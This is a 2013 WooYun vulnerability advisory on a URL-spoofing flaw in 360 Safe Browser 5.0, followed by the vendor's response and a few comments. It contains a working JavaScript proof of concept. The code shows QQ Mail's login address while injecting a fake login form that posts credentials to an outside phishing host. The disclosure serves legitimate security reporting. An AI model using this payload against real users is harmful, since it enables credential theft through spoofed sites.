当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-016951

漏洞标题:360安全浏览器URL欺骗漏洞(5.0正式版测试)

相关厂商:奇虎360

漏洞作者: Finger

提交时间:2013-01-05 14:13

修复时间:2013-02-19 14:13

公开时间:2013-02-19 14:13

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-01-05: 细节已通知厂商并且等待厂商处理中
2013-01-06: 厂商已经确认,细节仅向厂商公开
2013-01-09: 细节向第三方安全合作伙伴开放
2013-03-02: 细节向核心白帽子及相关领域专家公开
2013-03-12: 细节向普通白帽子公开
2013-03-22: 细节向实习白帽子公开
2013-02-19: 细节向公众公开

简要描述:

360安全浏览器URL欺骗漏洞
测试版本:360安全浏览器5.0正式版 文件版本:5.0.9.6

详细说明:

测试版本:360安全浏览器5.0正式版 文件版本:5.0.9.6

<script>
function poc(){
var w=open('res://c:%5cprogra~1%5c360%5c360se%5cpages%5cpages.dll/NAVIERR.HTM#-2146697211#https://mail.qq.com/cgi-bin/loginpage');
setTimeout(function(){
w.document.body.innerHTML='这是一个钓鱼页面<form action="http://www.diaoyu.org/qq.php" method="POST"><div class="infoContent block"><table class="formTable"><tbody><tr><th width="100">QQ:</th><td><input type="text" name="user" ></td></tr><tr><th width="100">密码:</th><td><input type="text" name="user" ></td></tr><tr><th>&nbsp;</th><td><input type="submit" value="登陆"> <input type="button" value="取消"></td></tr></tbody></table></div></form>';
},100)
}
</script>
<button onclick=poc();>打开QQ邮箱</button>

漏洞证明:

.jpg

修复方案:

版权声明:转载请注明来源 Finger@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-01-06 11:16

厂商回复:

感谢反馈。由于该漏洞需在独立IE8内核版(用户同时安装IE6环境)时,只有加载本地网页文件的方式才能被利用,因此危害等级为“低”。我们会尽快修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-01-05 14:33 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    mark

  2. 2013-01-05 15:58 | Clar ( 路人 | Rank:5 漏洞数:2 | 当前无)

    mark

  3. 2013-01-05 17:16 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    mark

  4. 2013-01-05 20:26 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    叫URL欺骗其实不是很准确

  5. 2013-01-05 22:02 | Fate ( 实习白帽子 | Rank:51 漏洞数:5 | www.0hk.org)

    mark